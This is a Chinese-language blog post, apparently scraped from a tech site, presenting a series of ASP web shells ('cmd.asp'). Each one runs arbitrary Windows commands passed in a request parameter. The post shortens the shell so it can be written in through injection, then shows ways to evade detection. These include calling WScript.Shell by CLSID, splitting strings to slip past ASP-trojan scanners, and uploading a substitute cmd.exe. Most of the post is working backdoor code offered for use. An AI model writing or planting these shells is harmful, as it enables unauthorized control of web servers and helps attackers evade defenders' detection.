第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:

<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>

用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>

这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp

<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:

<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

当然,classid值在不同系统下有所不同。这个要自行更改

第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:

<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

这里代码引号里的东东都可以随便拆的,像还可以拆成

<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c "&request("c")).stdout.readall%>

第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:

<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c "&request("c")).stdout.readall%>
第8个,asp代码可以加密吗?
当然可以了

asp执行cmd实例相关推荐

  1. C++使用CreateProcess执行cmd命令(实例演示)

    使用CreateProcess可以执行cmd命令,也可以执行一些可执行程序. //摘自msdn的示例代码 #include <windows.h> #include <stdio.h ...

  2. java -version cmd_java如何运行步骤cmd?Java执行cmd命令方法有哪些?

    写好一个java程序之后,我们的最终目的就是可以正确的运行程序,如果程序运行正确了,那么代码也就没有什么问题了,可是java如何运行步骤cmd?接下来,我们就来给大家讲解一下这方面的内容. 1.首先用 ...

  3. AJAX ASP/PHP 请求实例

    AJAX ASP/PHP 请求实例 ·                          Previous Page ·                          Next Page AJAX ...

  4. SQL下三种执行CMD命令的方法

    SQL下三种执行CMD命令的方法: 先删除7.18号日志: (1)exec master.dbo.xp_cmdshell 'del C:/winnt/system32/logfiles/W3SVC5/ ...

  5. java执行cmd命令详解

    前言 Java应用程序主要是通过Runtime和Process两个类来执行cmd命令. Runtime.exec方法创建本机进程并返回Process子类的实例,该实例可用于控制进程并获取有关它的信息. ...

  6. python执行cmd系统命令获取返回值的几种方式

    python 执行shell命令 注:python3.X模块中以废弃commands该模块,使用subprocess模块在本文下面增加解说 本篇介绍如何使用python在cmd上执行shell命令 用 ...

  7. Java执行cmd命令启动进程

    Java执行cmd命令启动进程 1.代码 //execute command through java applicationpublic static void exeCmd(){Runtime r ...

  8. 怎样在Python中执行cmd

    这篇文章主要给大家分享在Python中执行cmd,下文描述了三个方法使用os.system()方法.使用os.popen()方法.使用subprocess.Popen(),需要的朋友可以参考一下 1. ...

  9. java 执行 cmd 命令(转)

    原文出处:http://blog.csdn.net/saindy5828/article/details/11975527 用JAVA代码实现执行CMD命令的方法 java的Runtime.getRu ...

最新文章

  1. 抢红包算法 c语言,红包分配算法,抢红包算法
  2. 反射(高大上)、类的内置方法
  3. node内存配置(--max-old-space-size)
  4. java乱码base64,解决 JAVA WebSocket 解析 base64 后中文字符串乱码
  5. oracle 分页查询
  6. a5d27 emmc启动 修改1
  7. python中的自测语句是什么?
  8. canal+Kafka实现mysql与redis数据同步
  9. C# 如何判断系统是64位还是32位
  10. CentOS下编译安装LAMP开发环境
  11. ios 初体验窗口的创建
  12. JS调用ATL DLL
  13. Appium自动化测试-iOS
  14. 软件测试自我评价范文,软件测试工程师100字自我评价范文
  15. 2022第十七届巴拿马春晚-113万海内外观众欢聚迎新春
  16. 【原创】《矩阵的史诗级玩法》连载十七:用矩阵研究二次贝塞尔曲线和抛物线的关系(上)
  17. Selenium元素定位神器工具谷歌浏览器插件-ChroPath介绍,安装与使用
  18. LintCode 141. 对x开根 JavaScript算法
  19. oswatch的安装和使用
  20. 苹果手机2019年什么时候出新款_[创立24周年]因强大而简单.智者,驭时而进 唯一的对手是上一个自己。要有舍才有得! - 手机数码电玩维修...

热门文章

  1. 致青春触动心灵的英语美文——是时候让我们执掌未来
  2. 如何使用Matlab绘制常见的K线图(蜡烛图)
  3. Accessibility Insights 简介
  4. android上传图片并附带上传数据,文件流
  5. Maven报错:The packaging for this project did not assign a file to the build artifact
  6. WebKit渲染引擎特性,以Chrome V8为例
  7. innerHTML和innerText区别
  8. MongoDB可视化工具Robo 3T基础使用
  9. 机械工程还是计算机科学好,计算机科学技术、通信工程、机械制造及其自动化、电器工程及其自动化这几个专业哪个好...
  10. 余额宝转出到银行卡要手续费吗「解答」